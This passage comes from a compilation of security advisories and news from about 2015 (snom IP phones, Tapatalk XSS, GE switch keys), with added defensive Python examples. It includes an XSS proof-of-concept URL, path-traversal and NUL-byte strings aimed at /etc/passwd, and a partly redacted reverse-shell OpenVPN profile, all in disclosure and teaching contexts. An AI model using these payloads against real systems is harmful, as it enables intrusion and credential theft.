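                                            CREATEUR PROPRIETAIRE:(OI)(CI)(IO)(ID)F
"""


def parse_cacls(path, output):
    """Turn cacls output for `path` into a list of ACE dicts.  The path you
    queried is stripped from the first line, since cacls prints the first ACE
    right after it; lines that are not ACEs are continuation lines of the
    preceding special-access entry and are collected into its 'special' list."""
    first, *rest = [l for l in output.splitlines() if l.strip()]
    aces = []
    for raw in [first[len(path):]] + rest:
        m = ACE_RE.match(raw.strip())
        if m:
            aces.append({"principal": m["principal"].strip(),
                         "flags": re.findall(r"\(([A-Z]+)\)", m["flags"]),
                         "right": m["right"],
                         "special": []})
        elif aces and aces[-1]["right"].startswith("("):
            aces[-1]["special"].append(raw.strip())
    return aces


def weak_aces(aces):
    """ACEs that let any local user modify the object or its children."""
    weak = []
    for ace in aces:
        if ace["principal"].lower() not in LOW_PRIV_PRINCIPALS:
            continue
        if ace["right"] in WRITE_RIGHTS or WRITE_SPECIAL & set(ace["special"]):
            weak.append(ace)
    return weak


def directory_is_weak(path, output):
    """True when the listing grants write-class rights to a low-privilege principal."""
    return bool(weak_aces(parse_cacls(path, output)))


if __name__ == "__main__":
    for ace in weak_aces(parse_cacls(SAMPLE_PATH, SAMPLE_CACLS)):
        print("WEAK:", ace["principal"], "".join(f"({f})" for f in ace["flags"]), ace["right"])
```

The `(OI)(CI)(IO)` flags on the second Everyone entry are what make the finding serious: object- and container-inherit mean every file and subdirectory created under the install directory also ends up world-writable, which is exactly the condition the advisory exploits by swapping a binary. The `BUILTIN\Utilisateurs` entries, by contrast, only carry read and execute and are not reported.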
  21. SEC Consult Vulnerability Lab Security Advisory < 20150113-0 >
     =======================================================================
     title: Multiple critical vulnerabilities
     product: snom IP phones
     vulnerable version: all firmware versions <8.7.5.15, all firmware branches of all snom desktop IP phones (3xx, 7xx, 8xx, etc) are affected
     fixed version: 8.7.5.15 (for all desktop phones)
     impact: critical
     homepage: http://www.snom.com
     found: 2014-10-24
     by: Johannes Greil, Stefan Viehböck
     SEC Consult Vulnerability Lab
     https://www.sec-consult.com
     =======================================================================

     Vendor description:
     ===================
     "snom technology AG develops and manufacturers Voice-over-IP (VoIP) telephones based on open standard for enterprise communications. [...] The devices are suitable for use in all business environments ranging from home offices to small- and medium-sized enterprises and large corporations. snom also works directly with carriers, Internet Service Providers, and OEM customers. The company is globally present through branch offices and a partner network."
     source: http://www.snom.com/en/company/about-snom/

     "snom phones (hardware and software) are developed in Germany and strictly adhere to all applicable security standards (TLS and SRTP). In contrast to many of our competitors, snom as a German manufacturer is required to abide by the strict German data protection regulations and laws. This is of considerable importance for the prevention of phone-tapping."
     source: http://www.snom.com/en/company/statement/security/

     Business recommendation:
     ========================
     A short security crash test resulted in multiple critical security vulnerabilities within all desktop IP phones of snom and all firmware versions. There exist highly critical attack vectors as the IP phones can be completely compromised (root) by an external attacker. It is possible to e.g.
     * add a backdoor to the system which will even survive a factory reset!
     * remotely activate the built-in microphone in order to surveil the room where the phone is located,
     * tap into phone calls made or received by the compromised phone (e.g. by installing a sniffer on the phone),
     * redirect phone numbers to premium rate numbers which may result in high costs,
     * use the phone as a jump-host into the internal network and attack other systems.

     It is highly recommended by SEC Consult not to use this product until a thorough security review of the firmware has been performed by security professionals and all identified issues have been resolved.

     Vulnerability overview/description:
     ===================================
     1) Multiple cross site scripting vulnerabilities
     ------------------------------------------------
     The device's web interface suffers from multiple reflected & stored cross site scripting vulnerabilities, which may allow an attacker to gain unauthorized access to the admin interface and further compromise the phone.

     2) Path traversal filter bypass
     -------------------------------
     The firmware has a rudimentary filter against path traversal attacks within URL parameters. E.g. "../" characters within a parameter value will be filtered. This can be easily bypassed and potentially exploited for further attacks on the system (e.g. XML minibrowser or action URL features).

     3) Directory traversal & privilege escalation
     ---------------------------------------------
     It is possible to directly access the file system via path/directory traversal attacks within the URL. In order to exploit it, a certain file extension has to be added and cut off via a null byte which must not be transmitted in URL encoded form. Attackers are then able to easily gain access to sensitive files such as the snom phone configuration file which includes all passwords in cleartext, even for the admin user account (admin mode) which should not be accessible to a low privileged user.

     4) Command execution via VPN profiles
     -------------------------------------
     The phone's firmware supports OpenVPN profiles and the configuration can be uploaded via a tarball from a remote webserver. Admin access in the web GUI is needed which can be gained by exploiting other vulnerabilities, such as 3) and 5). By combining more identified vulnerabilities, even a remote attacker would be able to compromise the internal phone, e.g. add a XSS payload via CSRF in order to gain access to the admin mode password, then install the malicious OpenVPN profile. The attacker can prepare a malicious OpenVPN configuration file with shell commands in order to execute arbitrary commands on the IP phone with highest access rights on the operating system (root). There exist highly critical attack vectors after gaining root access to the phone:
     * add a backdoor to the system which will even survive a factory reset!
     * remotely activate the built-in microphone in order to surveil the room where the phone is located,
     * tap into phone calls made or received by the compromised phone,
     * use the phone as a jump-host into the internal network and attack other systems,
     * etc.
     This can also be exploited via TR069 or auto provisioning by a man-in-the-middle attacker! This can be achieved via the attacks described in 8).

     5) Authentication bypass & privilege escalation
     -----------------------------------------------
     Unprivileged users (non-admin accounts) have the ability to change the settings for function keys or action URLs on the phone. Attackers are able to exploit those features in order to gain administrative access rights on the web GUI and then exploit further vulnerabilities again, e.g. 4). The webserver does not check for any user credentials when accessed via localhost. By reconfiguring a function key or action URL to submit a request to localhost, it is possible to alter any configuration setting, e.g. overwrite the current admin-mode password and therefore gain admin access rights! This vulnerability is also automatically exploitable via CSRF, local access to the phone (e.g. for pressing a function key) is _not_ required! Further short tests have shown that an attacker could also use the request for altering the settings by directly accessing the IP address over the network. The bypass via localhost was not necessary. This can be achieved by sending the same malicious request multiple times.

     6) Cross-site request forgery issues
     ------------------------------------
     Attackers are able to remotely change settings, e.g. the admin mode password, on the device via CSRF attacks. Furthermore, it is possible to initiate arbitrary phone calls, e.g. to premium rate numbers, via CSRF! Short tests have shown that the anti-CSRF feature "use_hidden_tags" was not effective in the tested firmware version.

     7) Remote firmware update by unprivileged users
     -----------------------------------------------
     Unprivileged users are able to perform a firmware update via the web GUI. This is also exploitable for a remote attacker using CSRF! A local attacker could otherwise just simply boot the phone. An attacker would potentially be able to downgrade to a certain older firmware, in order to make older security bugs for exploitation available again. The phone presents the unprivileged user an error message, that admin access is required. But the phone will automatically perform the firmware update anyways!

     8) Plaintext provisioning through snom servers & weak device identifier
     -----------------------------------------------------------------------
     Every IP phone contacts the provisioning server of snom at "provisioning.snom.com" (IP: 80.237.155.31) for an initial setup phase or after a factory reset in order to retrieve the auto-provisioning URL for the TR069 server of the ISP. This connection is not secured and uses plaintext HTTP communication. Man-in-the-middle attackers (e.g.
TAO/QUANTUM attacks, DNS or BGP hijacking, etc.) can manipulate those requests, use their own TR069 server and install a backdoor on the phone (e.g. see 4) and afterwards provide the real TR069 URL for the ISP. The backdoor will survive the new settings/resets or firmware updates and be available to the attacker. Furthermore, the phone identifies itself only via the last three bytes of the MAC address, which can easily be brute-forced. An attacker would be able to retrieve all TR069 URLs of the ISPs and he could then potentially further attack those systems. Proof of concept: ================= Detailed proof of concept information has been removed from this advisory. This section will hence only give an overview regarding the vulnerabilities. 1) Multiple cross site scripting vulnerabilities ------------------------------------------------ The following payload can be used within the [removed] parameter in order to permanently store JavaScript within [removed]. This is also possible by importing [removed] contents via CSV files: [payload removed] The following URL automatically adds a new entry to the phonebook which contains JS code. This is also exploitable via CSRF to automatically insert malicious code without user interaction: [URL removed] The following URL is also exploitable because the webserver does not filter error messages. Browsers that do not url-encode the input are affected (e.g. older IE versions such as v6): [URL removed] 2) Path traversal filter bypass ------------------------------- In order to bypass the "../" filter, the following can be used as an example: [payload removed] The string [removed] at the end is necessary, otherwise the basename will be duplicated by the system. 3) Directory traversal & privilege escalation --------------------------------------------- The following URL can be used to gain access to the file /etc/passwd by combining a real null byte (not URL encoded %00), e.g. 
by using burp proxy hex mode, with certain appended file extensions: [URL removed] The following URL allows an attacker access to SIP credentials, admin mode password and other configuration settings in plaintext of the snom config.xml file: [URL removed] 4) Command execution via VPN profiles ------------------------------------- The following OpenVPN profile can be used in order to open a reverse shell to the attacker's system. The attacker will gain the highest access rights on the phone (root): dev tun proto tcp script-security 2 remote $someArbitraryOpenVPNIP 443 cipher AES-128-CBC auth SHA1 tls-verify [payload removed] resolv-retry infinite nobind persist-key persist-tun client verb 3 [...] In order to exploit it, any publicly available OpenVPN server can be misused with any credentials, as the payload is already executed during the initial TLS setup phase. It is easily possible to install a backdoor on the phone because the flash storage is writable. SEC Consult tested this by altering the init script "[removed]" and added a SSH daemon (as an example, any command can be run) which will be started on each boot. The init script does not get overwritten even after a factory reset, hence the backdoor can still be accessed afterwards. Attackers with root access can now completely compromise the phone, e.g. alter the configuration in order to enable call redirection to premium rate numbers, access the microphone, install a sniffer in order to record incoming/outgoing phone calls, or attack other internal systems, etc. 
5) Authentication bypass & privilege escalation ----------------------------------------------- By using the following URL to localhost as a so-called "action URL" associated to a function key on the device, it is possible to gain administrative access rights because the admin-mode password will be set to an attacker-controlled value: [URL removed] This also works when "restrict_uri_queries" and "use_hidden_tags" are set to "on", sometimes the function key has to be pressed multiple times then. See vulnerability 6) for infos on how to "press" the function key remotely via CSRF. By requesting the following URL with the direct IP address (not localhost) repeatedly, it was also possible to gain access to admin mode: [URL removed] 6) Cross-site request forgery issues ------------------------------------ The following URL can be used for CSRF attacks in order to initiate phone calls to arbitrary numbers (e.g. premium rate): [URL removed] The following URL will change the function key setting in order to change the admin mode password (see 5) via CSRF: a) URL for setting the function key value: [URL removed] URL for saving the function key modifications: [URL removed] c) URL for automatically executing the command of the function key "P1": [URL removed] By exploiting other issues in combination with CSRF, such as XSS and the OpenVPN command execution flaw, it is possible to remotely compromise the phone via CSRF. 7) Remote firmware update by unprivileged users ----------------------------------------------- The following URL can be used in order to load another firmware onto the device. 
The device will immediately switch to the firmware download mode even when accessed as unprivileged user, although the phone prints an error message that admin-mode access is required: [URL removed] 8) Plaintext provisioning through snom servers & weak device identifier ----------------------------------------------------------------------- No proof of concept necessary, wireshark shows plaintext communication. Vulnerable / tested versions: ============================= The IP phone snom 710 has been tested during a short security evaluation crash test with firmware version 8.7.4.7a pre-installed. Snom confirmed that _all_ older firmware versions are affected by the documented security vulnerabilities except the current new release 8.7.5.15! Although snom IP phone 710 has been tested, also _all_ other snom desktop IP phone products (e.g. 3xx, 7xx, 8xx, etc) are affected! Vendor contact timeline: ======================== 2014-10-31: Contacting vendor through office@snom.com, requesting security contact, attaching responsible disclosure policy & encryption keys 2014-11-04: No answer, contacting support@snom.com, sales@snom.com & marketing@snom.com, attaching responsible disclosure policy & encryption keys 2014-11-06: Calling German office, trying to reach a security contact, no useful information received Contacting other direct contacts of snom via Sales 2014-11-07: Receiving contact for security communication via Sales, exchanging encryption keys and sending encrypted security advisory to given contact 2014-11-18: Requesting status update - vulnerabilities have been forwarded to developers and are being processed 2014-11-28: Telco with new technical snom contact 2014-12-08 - 2014-12-11: Answering questions of snom regarding some vulnerabilities, postponing advisory release deadline to 13th January 2015, more time needed 2014-12-30: Requesting status update 2015-01-05: Last fixes are already in progress, scheduled for 13th January, receiving document containing 
detailed information regarding the fixes 2015-01-07: Asking which firmware versions and products are affected 2015-01-08: Calling snom, verifying affected products 2015-01-08: Sending adjusted advisory to snom 2015-01-08: Informing CERT.at and CERT-Bund Germany (BSI) about pending release 2015-01-13: Coordinated release of security advisory Solution: ========= The vendor provides a new firmware version v8.7.5.15 and urges all users to _immediately_ upgrade to this version! Vendor security note & firmware download: http://wiki.snom.com/8.7.5.15_OpenVPN_Security_Update Older firmware branches will not be patched and the upgrade to this new version is therefore absolutely necessary for all users! According to the vendor, the OpenVPN binary will be removed from the firmware per default and can be loaded as a small firmware update afterwards if necessary (see vendor security note above). Users of the OpenVPN feature will get a warning as they will be affected by the identified vulnerability again after enabling the feature. Workaround: =========== No workaround available. The vendor urges all customers to immediately upgrade the firmware of all snom IP phones. Advisory URL: ============= https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested to work with the experts of SEC Consult? Write to career@sec-consult.com EOF J. Greil / @2015 Source
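Added illustration, in Python, of the two path-handling mistakes described under 2) and 3) of the advisory above. It is not SEC Consult's removed proof of concept and not snom's code. It assumes that the "../" filter strips that sequence in a single pass (the advisory only says the filter "can be easily bypassed"; the real bypass string was removed) and that the extension check looks at the full request string while the file is later opened through a NUL-terminated C string, which is why the null byte must be sent raw rather than as %00. The web root, the file names and the inputs are constructed for the example; resolve_under_root is the hardened form a practitioner would want instead.

```python
"""
Illustration (added here, not SEC Consult's removed PoC and not snom's code)
of a single-pass "../" strip that can be bypassed, and of a string-level
extension check defeated by a raw NUL byte because the file system call
stops reading at the first NUL.  All inputs are constructed for the example.
"""
import posixpath


def naive_strip_dotdot(value: str) -> str:
    """Rudimentary filter (assumed behaviour, not snom's actual code): remove
    every '../' once.  Deleting the sequence can build a new one out of the
    characters around it, e.g. '....//' -> '../'."""
    return value.replace("../", "")


def naive_extension_check(path: str, allowed=(".html", ".xml")) -> bool:
    """Length-aware check done on the whole string: a NUL-embedded path still
    'ends with' an allowed extension."""
    return path.endswith(allowed)


def c_string_view(path: str) -> str:
    """What a NUL-terminated consumer such as open(2) actually sees: everything
    after the first NUL byte is gone."""
    return path.split("\0", 1)[0]


def resolve_under_root(root: str, requested: str) -> str:
    """Hardened resolver: reject NUL, canonicalise, then confirm the result is
    still inside root.  Raises ValueError for anything that escapes."""
    if "\0" in requested:
        raise ValueError("NUL byte in path")
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, requested.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError("path escapes root: " + candidate)
    return candidate


def demo(root: str = "/var/www") -> dict:
    """Run the three cases and return what each layer sees."""
    bypass = "....//....//etc/passwd"            # survives the single-pass strip
    nul_path = "../../etc/passwd\0.xml"           # raw NUL, not %00
    out = {
        "after_naive_filter": naive_strip_dotdot(bypass),
        "naive_ext_check_passes": naive_extension_check(nul_path),
        "what_open_sees": c_string_view(nul_path),
    }
    for p in (out["after_naive_filter"], nul_path, "index.html"):
        try:
            out["hardened:" + repr(p)] = resolve_under_root(root, p)
        except ValueError as err:
            out["hardened:" + repr(p)] = "rejected: " + str(err)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The order in resolve_under_root matters: the NUL check comes before any string manipulation, canonicalisation comes before the prefix test, and the prefix test includes the trailing slash so that a root of /var/www does not accept /var/www-old.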
22. WoltLab Burning Board 4.0 Tapatalk Cross Site Scripting

Advisory: Cross-site Scripting in Tapatalk Plugin for WoltLab Burning Board 4.0

RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability in the Tapatalk plugin for the WoltLab Burning Board forum software, which allows attackers to inject arbitrary JavaScript code via URL parameters.

Details
=======
Product: Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0
Affected Versions: >= 1.0.0
Fixed Versions: 1.1.2
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://tapatalk.com
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-015
Advisory Status: published
CVE: CVE-2014-8869
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8869

Introduction
============
"Tapatalk is an app built for interacting with discussion forums on mobile devices. It differs from a forum’s mobile web skin in that it offers the speed of a native app and a streamlined unified interface for every forum a user subscribes to. Tapatalk also creates a unique eco-system that allows forums to be searched and discovered by millions of Tapatalk users which in turn promotes content, new memberships, and interactions."
(from Tapatalk's Homepage)

More Details
============
The Tapatalk extension includes the PHP script welcome.php at the path com.tapatalk.wbb4/files/mobiquo/smartbanner/welcome.php which is accessible via the URL http://www.example.com/mobiquo/smartbanner/welcome.php on systems using the plugin. It outputs JavaScript code that includes improperly encoded values from the two URL parameters "app_android_id" and "app_kindle_url". Depending on which parameter is used, one of their values is assigned to the PHP variable $byo:

------------------------------------------------------------------------
<?php
[...]
else if (isset($_GET['app_android_id'])) {
    $app_android_id = $_GET['app_android_id'];
    if ($app_android_id && $app_android_id != '-1')
        $byo = "&app_android_id=$app_android_id";
}
else if (isset($_GET['app_kindle_url'])) {
    $app_kindle_url = $_GET['app_kindle_url'];
    if ($app_kindle_url && $app_kindle_url != '-1')
        $byo = "&app_kindle_url=$app_kindle_url";
}
------------------------------------------------------------------------

Later the $byo variable is used to build a URL without URL encoding it and the URL is used without further encoding in a script element:

------------------------------------------------------------------------
<?php
[...]
$ads_url = $protocol.'tapatalk.com/welcome_screen.php'
    .'?referer='.urlencode($referer)
    .'&code='.urlencode($code)
    .'&board_url='.urlencode($board_url)
    .'?='.urlencode($lang)
    .$byo
    .'&callback=?';
[...]
?>[...]
<script>$.getJSON("<?php echo $ads_url; ?>",function(data){
[...]
------------------------------------------------------------------------

Proof of Concept
================
The following URL can be used to demonstrate the vulnerability:

http://www.example.com/mobiquo/smartbanner/welcome.php?app_kindle_url=");alert('RedTeam Pentesting');</script><!--

The result is a notification showing the text "RedTeam Pentesting".

Workaround
==========
The PHP function urlencode() should be used to encode the $byo variable before building a URL with it.

Fix
===
Update the plugin to version 1.1.2.

Security Risk
=============
This security vulnerability is rated as a high risk. It allows to execute arbitrary JavaScript code in users' browsers if they access URLs prepared by attackers. This provides many different possibilities for further attacks against these users. Since the plugin is used for a bulletin board, the vulnerability could be exploited to display a fake login page and obtain credentials from users or administrators. The vulnerability also affects other web applications hosted on the same domain.

Timeline
========
2014-10-20 Vulnerability identified
2014-10-29 CVE number requested
2014-11-14 CVE number assigned
2014-11-26 Vendor notified via https://tapatalk.com/security.php
2014-12-16 Vendor notified again, received reply from vendor
2014-12-16 Vulnerability patched in SCM [0]
2014-12-23 Updated plugin released by vendor [1]
2015-01-08 Vendor updated release notes to mention XSS [2]
2015-01-12 Advisory released

References
==========
[0] https://github.com/tapatalk/tapatalk-wbb/commit/71024545904024cea9d04a887fdc64b9a9b85871
[1] https://github.com/tapatalk/tapatalk-wbb/commit/31472f6fcfffacd698b0c20809c4a8fb3c4f32f9
[2] https://support.tapatalk.com/threads/19540/#post-146253

RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de.

--
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                              https://www.redteam-pentesting.de
Germany                                   Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen

Source

WoltLab Burning Board 4.0 Tapatalk Open Redirect

The Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0 prior to version 1.1.2 allowed to redirect users to arbitrary URLs. This was possible by specifying the target URL in the URL parameter board_url in URLs like the following:

http://www.example.com/mobiquo/smartbanner/welcome.php?board_url=https://www.redteam-pentesting.de

CVE-2014-8870 was assigned to this issue.
Source
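Added example, written in Python rather than PHP so it runs stand-alone; it is neither the plugin's code nor the vendor's patch. It re-expresses the welcome.php concatenation quoted in the advisory above, then puts next to it the urlencode() workaround the advisory names for $byo (CVE-2014-8869) and an allowlist check for board_url against the open redirect (CVE-2014-8870). The allowlist is this example's own suggestion, since the page does not show how version 1.1.2 fixes the redirect; the referer, the host list and the payload are constructed for the example.

```python
"""
Added example (not Tapatalk's PHP, not the vendor's patch): the welcome.php
URL construction from the advisory re-expressed in Python, with the
urlencode() workaround for $byo and an allowlist guard for board_url.
"""
from urllib.parse import quote, urlsplit

ADS_BASE = "https://tapatalk.com/welcome_screen.php"


def pick_byo(params: dict, encode: bool) -> str:
    """$byo as in the quoted else-if chain: the first parameter that is set
    wins; it only yields a value when truthy (PHP treats '' and '0' as false)
    and not '-1'.  With encode=False this is the vulnerable concatenation."""
    for name in ("app_android_id", "app_kindle_url"):
        if name in params:                       # PHP isset()
            value = params[name]
            if value not in ("", "0", "-1"):
                return "&" + name + "=" + (quote(value, safe="") if encode else value)
            return ""
    return ""


def build_ads_url(params: dict, encode_byo: bool) -> str:
    """Mirror of the $ads_url concatenation.  The other values were already
    urlencode()d in the original; only $byo was not."""
    return (ADS_BASE
            + "?referer=" + quote(params.get("referer", ""), safe="")
            + "&board_url=" + quote(params.get("board_url", ""), safe="")
            + pick_byo(params, encode_byo)
            + "&callback=?")


def render_script(ads_url: str) -> str:
    """The template line: the URL is echoed into a JS string literal unescaped."""
    return '<script>$.getJSON("' + ads_url + '",function(data){});</script>'


def safe_inside_js_string(url: str) -> bool:
    """A value may only sit inside "..." in a <script> block if it carries no
    unescaped quote or backslash and cannot close the script element."""
    return not any(c in url for c in '"\\') and "</" not in url.lower()


def board_url_allowed(board_url: str, allowed_hosts) -> bool:
    """Open-redirect guard (this example's suggestion): only absolute http(s)
    URLs whose host is on the allowlist pass.  Scheme-relative (//evil),
    userinfo tricks (https://good@evil) and javascript: URLs all fail."""
    parts = urlsplit(board_url)
    return parts.scheme in ("http", "https") and parts.hostname in allowed_hosts


if __name__ == "__main__":
    payload = "\");alert('RedTeam Pentesting');</script><!--"   # the advisory's PoC value
    attack = {"referer": "http://www.example.com/", "app_kindle_url": payload}
    for encode in (False, True):
        url = build_ads_url(attack, encode)
        print("encoded" if encode else "vulnerable", safe_inside_js_string(url))
        print(render_script(url))
    for u in ("https://www.example.com/forum/", "https://www.redteam-pentesting.de",
              "//evil.example/", "https://www.example.com@evil.example/"):
        print(u, board_url_allowed(u, {"www.example.com"}))
```

quote(value, safe="") is the closest Python equivalent of PHP's urlencode() here: it leaves only letters, digits and "_.-~" untouched, so the double quote, the semicolon and the "</script>" of the PoC value all arrive percent-encoded and the JS string literal stays closed.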
  23. There are few things scarier these days than a politician stepping in front of a microphone, taking a deep breath and opening his mouth to pontificate on security. A long list of American elected officials have reinforced this, and on Monday, UK Prime Minister David Cameron jumped to the head of this undistinguished line with his dangerous statement that encrypted communications shouldn’t be allowed. Cameron, speaking in the wake of the terror attack in Paris last week, said at an event Monday that the UK government can’t allow any form of communication that can’t be read. “Are we going to allow a means of communications which it simply isn’t possible to read?” Cameron said, according to the New York Times. “My answer to that question is: ‘No, we must not.’ “ There are so many problems with what Cameron said that it’s hard to know where to begin. But let’s take it from the top. The government of a free country should not be in the business of allowing or disallowing any form of communication. Those are decisions that should fall to the users and the market, based on the technical and commercial merits of the service. Parliament and Congress have plenty of other things to occupy themselves, and having one of these bodies try to decide whether a given messaging service or Web site doesn’t meet with their approval is not just a waste of time and resources, but scary. The second issue is Cameron’s use of the word “read”. What he’s suggesting here is that the government should have the ability to not just intercept, but decrypt any form of communication that passes through the country’s networks. Thanks to the Snowden leaks, we know that Britain’s GCHQ intelligence service has the ability to intercept essentially whatever traffic it wants through a variety of methods. 
But in order to decrypt traffic from secure messaging services–apps that have gained huge amounts of popularity in the last couple of years–the UK would need to mandate some kind of backdoor, an idea that’s not just offensive to users but inherently dangerous. As security experts have said for decades now, a backdoor intended for one will end up being used by all. Attackers and security researchers are really good at finding unintentional weaknesses in software, so just imagine how much fun they’ll have looking for a backdoor that they know is there.

“There are enormous problems with this: there’s no back door that only lets good guys go through it. If your Whatsapp or Google Hangouts has a deliberately introduced flaw in it, then foreign spies, criminals, crooked police (like those who fed sensitive information to the tabloids who were implicated in the hacking scandal — and like the high-level police who secretly worked for organised crime for years), and criminals will eventually discover this vulnerability. They — and not just the security services — will be able to use it to intercept all of our communications,” author Cory Doctorow points out in his essay on Cameron’s proposal.

Aside from the specter of attackers identifying and exploiting an intentional backdoor, there is the problem of trying to bend software makers to the will of the government. Even if by some miracle the backdoor proposal succeeds, the government still would face the hurdle of getting software makers such as Apple to prevent secure communications apps from showing up in their app store. Apple does what Apple wants and generally not much else. And, as Doctorow says, how would Cameron address the global open source community, which produces much of the secure communications software? These kinds of systems just flat don’t work.

“It won’t work. The basic problem with these proposals is they work against regular people who don’t care.
But to make it work, you have to close the loopholes,” cryptographer Bruce Schneier, CTO of Co3 Systems, said in an interview. “If you can’t do that, you don’t hurt the bad guys, you only hurt the good guys. It plays well on TV to someone who doesn’t understand the tech. Everything works against my grandmother, but nothing works against professionals.” Someone, or several someones, is giving Cameron terrible advice on this subject and it’s clear that he hasn’t thought through the technical and social implications of what he’s proposing. Security and privacy are properties of free and open societies, not threats to them. Source
24. There is a hard-coded private SSL key present in a number of hardened, managed Ethernet switches made by GE and designed for use in industrial and transportation systems. Researchers discovered that an attacker could extract the key from the firmware remotely.

The vulnerability exists in a number of GE Ethernet switches, including the GE Multilink ML800/1200/1600/2400 Version 4.2.1 and prior and GE Multilink ML810/3000/3100 series switch Version 5.2.0 and prior. Researchers at IOActive discovered the vulnerability, and found that it could be exploited remotely. The vulnerability has been disclosed publicly already.

“The GE Multilink ML800 is subject to unauthorized access via hard-coded credentials. In addition, availability can be impacted through attacks composed of specifically crafted packets to the web server resulting in switch performance degradation. If attacks continue, the web server will be subject to a denial of service,” the advisory from ICS-CERT says. “The RSA private key used to decrypt SSL traffic in the switch can be obtained from the firmware allowing malicious users to decrypt traffic.”

In addition to the hardcoded private key, the IOActive researchers discovered that they could cause a denial-of-service on the Web interface by sending a series of specifically formatted packets.

“This denial-of-service attack affects the web interface used to configure the device with a web browser. It is recommended that when deploying the device into a production environment that the web server be disabled in order to effectively mitigate this vulnerability. After disabling the web interface, a user remains able to configure the device locally or remotely through the command line interfaces without risk of this attack. By connecting to the command line interface through serial terminal or telnet, it is possible to disable the web server,” the advisory says.

The advisory from GE has instructions on obtaining the patched firmware.

Source
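Added example, not IOActive's tooling and not GE's firmware: a small scanner that pulls PEM-encoded private keys out of a firmware image, which is the check that surfaces a hard-coded TLS key of the kind reported for the GE Multilink switches above. FIRMWARE below is constructed for this example (filler bytes, a certificate that must be ignored, a key block with a corrupt body, and one well-formed key); the embedded "key" is a toy DER SEQUENCE, not real key material, and the label and offset are what a practitioner would report.

```python
"""
Added example (not IOActive's or GE's code): find PEM private keys embedded
in a firmware image.  The FIRMWARE blob is constructed for this example and
the key body is a toy DER SEQUENCE, not a real key.
"""
import base64
import re

# PEM private-key block; the backreference ties the END label to the BEGIN label,
# so "RSA PRIVATE KEY", "EC PRIVATE KEY", "PRIVATE KEY" (PKCS#8) all match and
# certificates do not.
PEM_PRIVATE_KEY = re.compile(
    rb"-----BEGIN ((?:[A-Z]+ )*PRIVATE KEY)-----\s*(.*?)\s*-----END \1-----",
    re.DOTALL,
)


def find_private_keys(blob: bytes) -> list:
    """Return [(offset, label, der)] for every PEM private key whose body is
    valid base64.  Blocks with a corrupt body are skipped."""
    hits = []
    for m in PEM_PRIVATE_KEY.finditer(blob):
        body = b"".join(m.group(2).split())          # drop line breaks
        try:
            der = base64.b64decode(body, validate=True)
        except ValueError:                            # binascii.Error is a ValueError
            continue
        hits.append((m.start(), m.group(1).decode("ascii"), der))
    return hits


def looks_like_der(der: bytes) -> bool:
    """Every PKCS#1/PKCS#8 key is a DER SEQUENCE, so the first byte is 0x30."""
    return der[:1] == b"\x30"


def scan_file(path: str) -> list:
    """Convenience wrapper for a firmware image on disk."""
    with open(path, "rb") as f:
        return find_private_keys(f.read())


# Constructed image: filler, a certificate (ignored), a key with a corrupt body
# (skipped), then one well-formed key whose body is the toy DER SEQUENCE below.
TOY_DER = b"\x30\x06\x02\x01\x00\x02\x01\x05"        # SEQUENCE { INTEGER 0, INTEGER 5 }
FIRMWARE = (
    b"\x00" * 64 + b"ML800 web server strings\x00"
    + b"-----BEGIN CERTIFICATE-----\nMIIB\n-----END CERTIFICATE-----\n"
    + b"-----BEGIN RSA PRIVATE KEY-----\n!!!not base64!!!\n-----END RSA PRIVATE KEY-----\n"
    + b"\xff" * 16
    + b"-----BEGIN RSA PRIVATE KEY-----\n" + base64.encodebytes(TOY_DER)
    + b"-----END RSA PRIVATE KEY-----\n"
    + b"\x00" * 32
)


if __name__ == "__main__":
    for offset, label, der in find_private_keys(FIRMWARE):
        print("offset 0x%x: %s, %d bytes DER, sequence=%s"
              % (offset, label, len(der), looks_like_der(der)))
```

This only catches keys stored as PEM text; a key stored as raw DER or inside a compressed or encrypted file system segment needs the image unpacked first (binwalk or the vendor's own unpacker), after which the same scan applies to each extracted file.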
25. Adobe today released the year’s first round of security updates for Flash Player, addressing nine vulnerabilities in the software including several critical bugs that could allow an attacker to take control of an affected system.

According to a security bulletin posted by the company today, the vulnerabilities affect older versions of Flash on Windows, Macintosh and Linux machines. While version numbers differ by product installation, today’s updates primarily affect Flash Player version 16.0.0.235 and earlier.

Researchers working with Google’s Project Zero discovered three of the nine vulnerabilities, all of which can lead to code execution. One of the bugs is an information disclosure vulnerability (CVE-2015-0303) dug up by Chris Evans and Tavis Ormandy while another, a type confusion vulnerability (CVE-2015-0305), was found by researcher Natalie Silvanovich, working with Project Zero. Evans also helped Fermin J. Serna, a member of Google’s Security Team, in finding a use-after-free bug, which, like the previously mentioned bugs, could lead to code execution.

One of the more interesting bugs fixed can apparently be exploited to capture keystrokes on an affected system but no further information on the vulnerability, including who found it, was given by Adobe. A pair of heap-based buffer overflows that could lead to code execution, an improper file validation issue, and an out-of-bounds read vulnerability were also fixed by today’s Patch Tuesday updates.

